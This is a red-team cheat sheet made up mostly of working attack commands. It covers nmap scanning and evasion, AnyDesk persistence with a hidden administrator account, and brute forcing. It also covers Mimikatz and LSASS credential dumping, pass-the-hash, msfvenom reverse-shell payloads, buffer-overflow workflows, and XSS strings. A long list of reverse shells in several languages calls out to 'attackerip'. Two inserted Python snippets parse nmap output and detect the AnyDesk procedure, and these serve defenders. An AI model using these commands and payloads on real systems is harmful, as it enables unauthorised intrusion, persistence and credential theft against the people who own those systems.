Red Team and OPSEC - 2023 Edition

The quieter you become, the more you are able to hear 🥷

Basic System Info

Hotfix Information

User & Group Information

Network Details

Privilege Information

Process & Service Details

Network Connections

Directory Access

Domain & Forest Info (PowerShell)

Domain Controller and Trusts

Authentication & Session Details

Miscellaneous

Host Discovery

Discover alive hosts in a network.

# Ping scan, no port scan
$ nmap -sn -T4 -oG Discovery.gnmap 192.168.1.1/24

# Extract live hosts from the results
$ grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > LiveHosts.txt

Top Ports Scan

Identify the most commonly used ports.

# TCP SYN scan
$ nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt

# UDP scan
$ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt

Full Range Port Scan

Full range port scanning; UDP might be slow.

# Top 3674 TCP ports
$ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt

# All TCP ports
$ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt

# All UDP ports
$ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt

Extract Open Ports

Commands to extract the open TCP and UDP ports from the FullTCP/FullUDP results and print them in nmap -p syntax (T:... and U:...).

$ grep "open" FullTCP | cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' | xargs | sed 's/ /,/g' | awk '{print "T:"$0}'
$ grep "open" FullUDP | cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' | xargs | sed 's/ /,/g' | awk '{print "U:"$0}'

Service and OS Detection

Identify running services and OS details.

# Service detection
$ nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt

# OS detection
$ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt

# Combined OS and service detection for specific ports
$ nmap -O -sV -T4 -Pn -p U:53,111,137,T:21-25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts.txt

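The grep/cut pipelines above work, but they are easy to get subtly wrong (the grep "open" pipeline also picks up open|filtered UDP ports, for instance). As an added example, not part of the original cheat sheet, here is a small Python parser that does the same job for both the grepable (-oG) discovery output and the normal (-oN) port scan output and renders the result in nmap -p syntax. The scan output embedded below is constructed for the example, not captured from a real network, and the function names are my own.

```python
from __future__ import annotations

import re

# Constructed sample of nmap grepable (-oG) output from a ping scan (-sn),
# the shape written to Discovery.gnmap above. Not captured from a real network.
SAMPLE_GREPABLE = """\
# Nmap 7.93 scan initiated Wed Mar  1 09:00:00 2023 as: nmap -sn -T4 -oG Discovery.gnmap 192.168.1.1/24
Host: 192.168.1.10 ()\tStatus: Up
Host: 192.168.1.20 ()\tStatus: Up
Host: 192.168.1.30 ()\tStatus: Down
# Nmap done at Wed Mar  1 09:00:05 2023 -- 256 IP addresses (2 hosts up) scanned in 5.00 seconds
"""

# Constructed sample of nmap normal (-oN) output from a port scan (the FullTCP/FullUDP shape).
SAMPLE_NORMAL = """\
# Nmap 7.93 scan initiated Wed Mar  1 10:00:00 2023 as: nmap -sS -sU -T4 -Pn -oN Full -iL LiveHosts.txt
Nmap scan report for 192.168.1.10
Host is up (0.0010s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
443/tcp  filtered https

Nmap scan report for 192.168.1.20
Host is up (0.0020s latency).
PORT     STATE         SERVICE
22/tcp   open          ssh
53/udp   open|filtered domain
161/udp  open          snmp
"""

_GREP_HOST_UP = re.compile(r"^Host: (\S+)\s.*\bStatus: Up\s*$")
_REPORT_HEADER = re.compile(r"^Nmap scan report for (\S+)")
# Only a definite "open" state: "open|filtered" is deliberately excluded, which the
# grep "open" pipeline above does not distinguish.
_OPEN_PORT = re.compile(r"^(\d+)/(tcp|udp)\s+open\s")


def live_hosts(grepable: str) -> list[str]:
    """Equivalent of: grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' '."""
    hosts = []
    for line in grepable.splitlines():
        m = _GREP_HOST_UP.match(line)
        if m:
            hosts.append(m.group(1))
    return hosts


def open_ports(normal: str) -> dict[str, dict[str, set[int]]]:
    """Map each scanned host to its definitely-open TCP and UDP port numbers."""
    result: dict[str, dict[str, set[int]]] = {}
    host = None
    for line in normal.splitlines():
        m = _REPORT_HEADER.match(line)
        if m:
            host = m.group(1)
            result[host] = {"tcp": set(), "udp": set()}
            continue
        m = _OPEN_PORT.match(line)
        if m and host is not None:
            result[host][m.group(2)].add(int(m.group(1)))
    return result


def port_spec(ports: dict[str, set[int]]) -> str:
    """Render the port sets in nmap -p syntax (e.g. "T:22,80,U:161"), the same shape
    the awk '{print "T:"$0}' pipeline above produces, ready for a follow-up -sV scan."""
    parts = []
    for proto, prefix in (("tcp", "T:"), ("udp", "U:")):
        if ports[proto]:
            parts.append(prefix + ",".join(str(p) for p in sorted(ports[proto])))
    return ",".join(parts)


if __name__ == "__main__":
    print("live hosts:", live_hosts(SAMPLE_GREPABLE))
    for scanned_host, host_ports in open_ports(SAMPLE_NORMAL).items():
        print(scanned_host, port_spec(host_ports))
```

Feeding real files is a matter of `open_ports(open("FullTCP").read())`; the per-host port specs are what you would pass to the combined -O -sV scan in the last step, scoped to what is actually open.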
Evasion Techniques

Methods to avoid firewalls or obfuscate scan origin.

Segmentation

MTU Manipulation

Decoy Scanning

Make the scan appear to come from other hosts.

# Randomized decoy scan (10 decoys)
$ nmap -D RND:10 [target]

# Manually specified decoys
$ nmap -D decoy1,decoy2,decoy3 [target]

Zombie Host Scanning

Use an idle host to mask the scan origin.

# Idle scan using a specific zombie
$ nmap -sI [Zombie IP] [Target IP]

Specified Source Port

AnyDesk OPSEC Usage

This section outlines the use of AnyDesk, a commercial remote access tool that threat actors have used to browse victim file systems, deploy payloads, and exfiltrate data.

Downloading and Installing AnyDesk:

  1. Download AnyDesk Executable: download the AnyDesk executable using PowerShell.

      Invoke-WebRequest -Uri <AnyDesk_Download_URL> -OutFile 'C:\ProgramData\AnyDesk.exe'

  2. Silent Installation and Password Configuration: silently install AnyDesk and set an access password.

      cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
      cmd.exe /c echo <Your_Password> | C:\ProgramData\AnyDesk.exe --set-password

Configuring Additional Administrator Account:

  1. Create an Additional Administrator Account: add an account with a password.

      net user <Username> "<Password>" /add

  2. Add Account to Administrators Group: include the new account in the Administrators group.

      net localgroup Administrators <Username> /ADD

  3. Hide Account from Login Screen: prevent the account from appearing on the login screen.

      reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v <Username> /t REG_DWORD /d 0 /f

Gaining Remote Access with AnyDesk:

  1. Execute AnyDesk with the Get-ID Parameter: launch AnyDesk with --get-id to obtain the ID used for remote access.

      cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id

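Every step of the AnyDesk procedure above leaves a process-creation record, and the combination (silent install, password set from the command line, a new local administrator hidden via the SpecialAccounts\Userlist key) is far more specific than any single command. As an added example, not part of the original cheat sheet, the Python below runs a small rule set over process-creation events and then correlates the account-level findings. The events are constructed to mirror the commands above (host names, user names, paths and the password are made up), and the rule and function names are my own.

```python
from __future__ import annotations

import re
from collections import defaultdict

# Constructed sample of process-creation events (the fields a Sysmon Event ID 1 or
# Security Event ID 4688 record carries), flattened to "timestamp|host|user|command line".
# Hosts, accounts, paths and the password are made up for this example.
SAMPLE_EVENTS = [
    r"2023-04-02T10:01:00|WS01|CORP\jdoe|powershell.exe Invoke-WebRequest -Uri https://download.invalid/AnyDesk.exe -OutFile C:\ProgramData\AnyDesk.exe",
    r"2023-04-02T10:01:30|WS01|CORP\jdoe|cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent",
    r"2023-04-02T10:01:45|WS01|CORP\jdoe|cmd.exe /c echo ExamplePass123 | C:\ProgramData\AnyDesk.exe --set-password",
    r"2023-04-02T10:02:00|WS01|CORP\jdoe|net user svc_backup ExamplePass123 /add",
    r"2023-04-02T10:02:05|WS01|CORP\jdoe|net localgroup Administrators svc_backup /ADD",
    r'2023-04-02T10:02:10|WS01|CORP\jdoe|reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v svc_backup /t REG_DWORD /d 0 /f',
    r"2023-04-02T11:00:00|WS02|CORP\it-admin|C:\Program Files\AnyDesk\AnyDesk.exe",  # ordinary interactive use
]

# (rule name, pattern). Where a pattern has a capturing group it extracts the account name.
RULES = [
    ("anydesk_silent_install", re.compile(r"anydesk\.exe.*--install\b.*--silent", re.I)),
    ("anydesk_set_password", re.compile(r"anydesk\.exe\s+--set-password", re.I)),
    ("anydesk_get_id", re.compile(r"anydesk\.exe\s+--get-id", re.I)),
    ("local_user_added", re.compile(r"\bnet1?(?:\.exe)?\s+user\s+(\S+)(?:\s+\S+)?\s+/add\b", re.I)),
    ("added_to_administrators", re.compile(r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+(\S+)\s+/add\b", re.I)),
    ("account_hidden_from_logon", re.compile(r"specialaccounts\\userlist.*?/v\s+(\S+)\s+/t\s+reg_dword\s+/d\s+0\b", re.I)),
]


def parse_event(line: str) -> dict[str, str]:
    ts, host, user, cmd = line.split("|", 3)
    return {"timestamp": ts, "host": host, "user": user, "cmd": cmd}


def scan_events(lines: list[str]) -> list[dict[str, str | None]]:
    """Return one finding per (event, matching rule), in event order."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        for name, pattern in RULES:
            m = pattern.search(ev["cmd"])
            if m:
                findings.append({
                    "timestamp": ev["timestamp"],
                    "host": ev["host"],
                    "user": ev["user"],
                    "rule": name,
                    "account": m.group(1) if m.groups() else None,
                })
    return findings


def hidden_admin_accounts(findings: list[dict[str, str | None]]) -> list[str]:
    """Accounts that were both added to Administrators and hidden from the logon
    screen: the combination the procedure above relies on, and a strong signal alone."""
    rules_by_account: dict[str, set[str]] = defaultdict(set)
    for f in findings:
        if f["account"]:
            rules_by_account[f["account"].lower()].add(f["rule"])
    wanted = {"added_to_administrators", "account_hidden_from_logon"}
    return sorted(acct for acct, rules in rules_by_account.items() if wanted <= rules)


def hosts_with_rule(findings: list[dict[str, str | None]], rule: str) -> set[str]:
    return {f["host"] for f in findings if f["rule"] == rule}


if __name__ == "__main__":
    hits = scan_events(SAMPLE_EVENTS)
    for h in hits:
        print(h["timestamp"], h["host"], h["rule"], h["account"] or "")
    print("hidden local admins:", hidden_admin_accounts(hits))
```

The interactive AnyDesk launch on WS02 produces no finding, which is the point of matching on the unattended-install and password-setting switches rather than on the binary name: legitimate helpdesk use of the same tool should not page anyone.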
Web Path Scanner and Brute Force Tools

Web Path Scanners:

1. dirsearch

2. DirBuster

3. Patator (Password Guessing)

Brute Force with Patator:

$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst
$ patator smtp_login host=192.168.17.129 user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
$ patator smtp_login host=192.168.17.129 helo='ehlo 192.168.17.128' user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst -x ignore:fgrep='incorrect password or account name'

DNS Enumeration with Fierce:

Web Service Scanning with Nikto:

WordPress Scan with WPScan:

HTTP Fingerprint Identification with Httprint:

Web Application Security Scanning with Skipfish:

Network Scanning and Enumeration:

NC (Netcat) Scan:

# Basic port scan on 'target'
nc -v -w 1 target -z 1-1000

# Port scan range on a set of IP addresses
for i in {101..102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done

Unicornscan:

# Unicornscan for information gathering and security audits
# Scanning for all ports and services (TCP and UDP)
us -H -msf -Iv 192.168.56.101 -p 1-65535
us -H -mU -Iv 192.168.56.101 -p 1-65535

Xprobe2 for OS Fingerprinting:

# Identify the operating system fingerprint on 'IP'
xprobe2 -v -p tcp:80:open IP

Enumeration and Windows Commands:

Samba Enumeration:

# Enumeration of Samba services on 'target'
nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target

SNMP Enumeration:

# Enumerating SNMP on 'IP' using different commands
snmpget -v 1 -c public IP
snmpwalk -v 1 -c public IP
snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP

Windows Commands:

# Various Windows command-line operations
net localgroup Users
net localgroup Administrators
# Recursive search for .doc files
dir /s *.doc
# Perl: open a new console window running $cmd
system("start cmd.exe /k $cmd")
# Register a service that launches netcat
sc create microsoft_update binpath="cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe" start= auto error= ignore
# Netcat connect-back (argument to cmd /c)
/c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779
# Mimikatz: read logon credentials from the live LSASS process...
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"
# ...or from an LSASS minidump taken with ProcDump
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"
# ProcDump on 32-bit and 64-bit systems
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp

Tunneling and Port Forwarding:

PuTTY Remote Port Forwarding:

# Forward the remote port to the destination address using PuTTY
plink.exe -P 22 -l root -pw "1234" -R 445:127.0.0.1:445 IP

Meterpreter Port Forwarding:

# Meterpreter port forwarding for remote access
# For detailed usage, refer to https://www.offensive-security.com/metasploit-unleashed/portfwd/
meterpreter > portfwd add -l 3389 -p 3389 -r 172.16.194.141
kali > rdesktop 127.0.0.1:3389

Enabling RDP and Firewall Manipulation:

# Enable the RDP service and configure firewall settings
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable

# Close Windows Firewall
netsh firewall set opmode disable

Meterpreter VNC/RDP:

# Enabling VNC/RDP with Meterpreter
# For detailed usage, refer to https://www.offensive-security.com/metasploit-unleashed/enabling-remote-desktop/
run getgui -u admin -p 1234
run vnc -p 5043

Using Mimikatz:

# Using Mimikatz to retrieve Windows plaintext user name and password
git clone https://github.com/gentilkiwi/mimikatz.git
privilege::debug
sekurlsa::logonPasswords full

Password Hash Gathering and Cracking

Gathering Password Hash:

Using pth-toolkit and pth-winexe:

# Clone pth-toolkit and retrieve a shell using the hash
git clone https://github.com/byt3bl33d3r/pth-toolkit
pth-winexe -U hash //IP cmd

Using xfreerdp:

# Install freerdp-x11 and connect using a hash
apt-get install freerdp-x11
xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP

Using Meterpreter:

# Use Meterpreter to gather hashes
meterpreter > run post/windows/gather/hashdump

Exploiting Hash to Gain Access:

Using Metasploit psexec:

# Set up a Meterpreter reverse shell using the hash
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set SMBPass HASH
msf exploit(psexec) > exploit
meterpreter > shell

Password Cracking with Hashcat:

Using Hashcat:

# Crack passwords using Hashcat
hashcat -m 400 -a 0 hash /root/rockyou.txt

Using Netcat (NC) for Shell Bouncing on Windows

Listening and Connecting with NC:

Setting Up a Listener:

# Windows: Listen on port 31337 and execute cmd.exe
c:> nc -Lp 31337 -vv -e cmd.exe

Connecting to the Listener:

# Connect to the Windows listener on IP and port 31337
nc 192.168.0.10 31337

Executing Shell on a Remote Host:

# Execute cmd.exe on a remote host via NC
c:> nc example.com 80 -e cmd.exe

Setting Up a Listener on Port 80:

# Listen on port 80
nc -lp 80

Advanced NC Options:

Bouncing Shell with /bin/bash:

# Serve /bin/bash to whoever connects on port 31337 (the Linux side of the bounce)
nc -lp 31337 -e /bin/bash

Randomize Output and Wait:

# Scan ports 1-1000 in random order (-r), giving up on each after 1 second (-w 1)
nc -vv -r -w 1 192.168.0.10 -z 1-1000

Finding SUID/SGID and Orphaned Files

Locate SUID root files:

# Search for SUID root files
find / -user root -perm -4000 -print

Locate SGID root files:

# Search for SGID root files
find / -group root -perm -2000 -print

Locate SUID and SGID files:

# Search for both SUID and SGID files
find / -perm -4000 -o -perm -2000 -print

Find files that do not belong to any user:

# Search for files without an assigned user
find / -nouser -print

Locate files that do not belong to any user group:

# Search for files without an assigned user group
find / -nogroup -print
# Search for symbolic links and show their targets
find / -type l -ls

Python Shell Escalation:

# Escalate to a Python shell
python -c 'import pty;pty.spawn("/bin/bash")'

Python, Ruby, and PHP HTTP Servers:

Python 2 HTTP Server:

# Start a Python 2 HTTP server
python2 -m SimpleHTTPServer

Python 3 HTTP Server:

# Start a Python 3 HTTP server
python3 -m http.server

Ruby HTTP Server (WEBrick):

# Start a Ruby WEBrick HTTP server on port 8888
ruby -rwebrick -e 'WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start'

PHP HTTP Server:

# Start a PHP HTTP server on IP 0.0.0.0 and port 8888
php -S 0.0.0.0:8888

Getting Process PID:

Find PID for a Port:

# Get the PID for a process using port 80
fuser -nv tcp 80

Kill a Process by Port:

# Kill the process using port 80
fuser -k -n tcp 80

Using Hydra to Crack RDP:

# Use Hydra against RDP with a single username (-l) and a password file (-P)
hydra -l admin -P /root/Desktop/passwords -t 1 -vV -f -o hydra_output.txt rdp://X.X.X.X

Mounting a Remote Windows Shared Folder (SMB):

# Mount a remote Windows shared folder to /mnt/remote/
smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw

Compiling an Exploit in Kali:

Compile a 32-bit Executable:

# Compile a 32-bit executable from hello.c
gcc -m32 -o output32 hello.c

Compile a 64-bit Executable:

# Compile a 64-bit executable from hello.c
gcc -m64 -o output hello.c

Compiling a Windows Exploit in Kali:

# Download and install MinGW
wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
wine mingw-get-setup.exe
# Select mingw32-base during installation
# Navigate to the MinGW bin directory
cd /root/.wine/drive_c/windows
wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
cd /root/.wine/drive_c/MinGW/bin
# Compile the exploit.c to ability.exe with necessary libraries
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
# Execute the compiled Windows exploit
wine ability.exe

NASM (Netwide Assembler) Commands:

# Assemble an assembly source file to binary
nasm -f bin -o payload.bin payload.asm

# Assemble to ELF format and link, then display the disassembled code
nasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload

SSH Penetration:

# SSH tunnel with dynamic port forwarding on local port 1080
ssh -D 127.0.0.1:1080 -p 22 user@IP

# Add SOCKS4 proxy configuration to /etc/proxychains.conf
# Append: socks4 127.0.0.1 1080

# Use proxychains to route commands through the SSH tunnel
proxychains commands target

# SSH penetration from one network to another, chaining multiple SSH connections

# First SSH tunnel with dynamic port forwarding
ssh -D 127.0.0.1:1080 -p 22 user1@IP1

# Add SOCKS4 proxy configuration to /etc/proxychains.conf
# Append: socks4 127.0.0.1 1080

# Second SSH tunnel with dynamic port forwarding through the first tunnel
proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2

# Add SOCKS4 proxy configuration to /etc/proxychains.conf
# Append: socks4 127.0.0.1 1081

# Use proxychains to route commands through the second SSH tunnel
proxychains commands target

Using Metasploit for Penetration

Metasploit is a powerful penetration testing tool that provides a wide range of functionalities for identifying vulnerabilities and executing exploits. Here are some useful Metasploit commands and techniques:

  1. IP Configuration and Routing: obtain the IP address of the compromised system, configure routing, and pivot through it.

      meterpreter > ipconfig
      IP Address: 10.1.13.3
      meterpreter > run autoroute -s 10.1.13.0/24
      meterpreter > run autoroute -p
      10.1.13.0 255.255.255.0 Session 1

  2. Exploiting Remote Systems: exploit a remote Windows system using the SMB psexec exploit module.

      meterpreter > Ctrl+Z
      msf auxiliary(tcp) > use exploit/windows/smb/psexec
      msf exploit(psexec) > set RHOST 10.1.13.2
      msf exploit(psexec) > exploit
      meterpreter > ipconfig
      IP Address: 10.1.13.2

  3. Exploit-DB Search: search the Exploit-DB database by keyword.

      git clone https://github.com/offensive-security/exploit-database.git
      cd exploit-database
      ./searchsploit -u
      ./searchsploit apache 2.2
      ./searchsploit "Linux Kernel"

  4. Exploit-DB CSV Filtering: filter for specific exploits within the Exploit-DB CSV file.

      cat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep "<|<=" | sort -k3

  5. MSF Payload Generation: generate Metasploit payloads for different platforms and scenarios.

      msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> -f exe > system.exe
      msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -f raw > exploit.php
      msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -f asp > file.asp
      msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -b "\x00" -f c

  6. MSF Payloads for Linux and Shellcode: generate payloads and shellcode for Linux and Windows.

      msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -f elf -a x86 > shell
      msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b "\x00\x0a\x0d" -a x86 -f c

  7. Other Payload Types: generate payloads for Python, ASP, Bash, and more.

      msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py
      msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port> -f asp -a x86 > shell.asp
      msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port> -o shell.sh
      msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port> -o shell.php
      # Add '<?php' at the beginning and run: perl -i~ -0777pe's/^/<?php \n/' shell.php
      msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port> -f exe -a x86 > shell.exe

Linux commonly used security commands

# SUID binaries owned by root
find / -uid 0 -perm -4000

# World-writable files
find / -perm -o=w

# Files with names made of spaces or dots, a common way to hide files
find / -name " " -print
find / -name ".." -print
find / -name ". " -print
find / -name " " -print

# Files whose owner no longer exists in /etc/passwd
find / -nouser

# Open files that have been deleted (link count below 1)
lsof +L1

# Open network sockets
lsof -i

# ARP cache
arp -a

# Users and groups, including directory-backed ones
getent passwd

getent group

# Crontabs of every user
for user in $(getent passwd|cut -f1 -d:); do echo "### Crontabs for $user ####"; crontab -u $user -l; done

# Generate four random 12-character passwords
cat /dev/urandom| tr -dc 'a-zA-Z0-9-_!@#$%^&*()_+{}|:<>?='|fold -w 12| head -n 4

# Find files with the immutable attribute set, then clear it on a given file
find . | xargs -I file lsattr -a file 2>/dev/null | grep '^....i'
chattr -i file

Windows Buffer Overflow exploits

msfvenom -p windows/shell_bind_tcp -a x86 --platform win -b "\x00" -f c
msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 -a x86 --platform win -e x86/shikata_ga_nai -b "\x00" -f c

COMMONLY USED BAD CHARACTERS:

\x00\x0a\x0d\x20 for HTTP requests
\x00\x0a\x0d\x20\x1a\x2c\x2e\x3a\x5c ending with (0\n\r_)

Usual workflow:

pattern create
pattern offset (EIP address)
pattern offset (ESP address)
Pad with junk up to the EIP offset, overwrite EIP with the address of a JMP ESP instruction, and place the shellcode at ESP.

!pvefindaddr pattern_create 5000
!pvefindaddr suggest
!pvefindaddr nosafeseh


!mona config -set workingfolder C:\Mona\%p

!mona config -get workingfolder
!mona mod
!mona bytearray -b "\x00\x0a"
!mona pc 5000
!mona po EIP
!mona suggest

SEH - Structured Exception Handling

Note: SEH (Structured Exception Handling) is the mechanism the Windows operating system provides to programmers for handling processor errors and exceptions.

# https://en.wikipedia.org/wiki/Microsoft-specific_exception_handling_mechanisms#SEH
# http://baike.baidu.com/view/243131.htm
!mona suggest
!mona nosafeseh
nseh="\xeb\x06\x90\x90" (next SEH: a 6-byte short jump)
iseh= !pvefindaddr p1 -n -o -i (POP POP RETN, i.e. POP r32, POP r32, RETN)

ROP (DEP)

Note: ROP (Return-Oriented Programming) is an exploitation technique that chains together fragments of code already present in a process so that an attacker can run code even when defenses such as non-executable memory and code signing are in place.

DEP (Data Execution Prevention) is a set of hardware and software technologies that strictly separates code from data in memory, so that data cannot be executed as code.

# https://en.wikipedia.org/wiki/Return-oriented_programming
# https://zh.wikipedia.org/wiki/%E8%BF%94%E5%9B%9E%E5%AF%BC%E5%90%91%E7%BC%96%E7%A8%8B
# https://en.wikipedia.org/wiki/Data_Execution_Prevention
# http://baike.baidu.com/item/DEP/7694630
!mona modules
!mona ropfunc -m *.dll -cpb "\x00\x09\x0a"
!mona rop -m *.dll -cpb "\x00\x09\x0a" (auto suggest)

ASLR - Address Space Layout Randomization

# https://en.wikipedia.org/wiki/Address_space_layout_randomization
!mona noaslr

Egg Hunter technique

Egg hunting is a "staged shellcode" technique: a small, specially crafted piece of shellcode (the hunter) searches memory for a tag that marks the real, larger shellcode (the "egg") and jumps to it. In other words, a short stub executes first, then locates the real shellcode and executes it. See the Ice Forum (pediy) reference and the other links below for details.

# https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
# http://www.pediy.com/kssd/pediy12/116190/831793/45248.pdf
# http://www.fuzzysecurity.com/tutorials/expDev/4.html
!mona jmp -r esp
!mona egg -t lxxl
\xeb\xc4 (short jump backward by 60 bytes)
buff=lxxllxxl+shell
!mona egg -t 'w00t'

GDB Debugger commonly used commands

break *_start
next
step
n
s
continue
c

Data

Checking 'REGISTERS' and 'MEMORY'

Display the register values (decimal, binary, hex):

print /d -> Decimal
print /t -> Binary
print /x -> Hex
O/P :
(gdb) print /d $eax
$17 = 13
(gdb) print /t $eax
$18 = 1101
(gdb) print /x $eax
$19 = 0xd
(gdb)

Display the value of a specific memory address

command : x/nyz (Examine)
n –> Number of fields to display ==>
y –> Format for output ==> c (character) , d (decimal) , x (Hexadecimal)
z –> Size of field to be displayed ==> b (byte) , h (halfword), w (word 32 Bit)

Bash reverse shell

bash -i >& /dev/tcp/X.X.X.X/443 0>&1

exec /bin/bash 0&0 2>&0

0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

exec 5<>/dev/tcp/attackerip/4444
cat <&5 | while read line; do $line 2>&5 >&5; done # or:
while read line 0<&5; do $line 2>&5 >&5; done

/bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1
/bin/bash -i > /dev/tcp/X.X.X.X/443 0<&1 2>&1

Perl reverse shell

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Windows platform

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby reverse shell

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Windows platform

ruby -rsocket -e 'c=TCPSocket.new("attackerip","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
ruby -rsocket -e 'f=TCPSocket.open("attackerip","443").to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Python reverse shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP reverse shell

php -r '$sock=fsockopen("attackerip",443);exec("/bin/sh -i <&3 >&3 2>&3");'

Java reverse shell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/attackerip/443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Netcat reverse shell

nc -e /bin/sh attackerip 4444
nc -e /bin/sh 192.168.37.10 443

If the -e parameter is disabled, you can try the following commands

mknod backpipe p && nc attackerip 443 0<backpipe | /bin/bash 1>backpipe
/bin/sh | nc attackerip 443
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4443 0</tmp/p | /bin/bash 1>/tmp/p

If you installed the wrong version of netcat, try the following command

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip <port> >/tmp/f

Telnet reverse shell

If netcat is not available

mknod backpipe p && telnet attackerip 443 0<backpipe | /bin/bash 1>backpipe

Xterm reverse shell

Enable the X server (display :1 listens on TCP port 6001)

apt-get install xnest
Xnest :1

Remember to authorize the connection from the target IP

xterm -display 127.0.0.1:1

Grant access

xhost +targetip

Connect back to our X server on the target machine

xterm -display attackerip:1
/usr/openwin/bin/xterm -display attackerip:1
or
$ DISPLAY=attackerip:0 xterm

XSS

# https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
("< iframes > src=http://IP:PORT </ iframes >")

<script>document.location=http://IP:PORT</script>

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

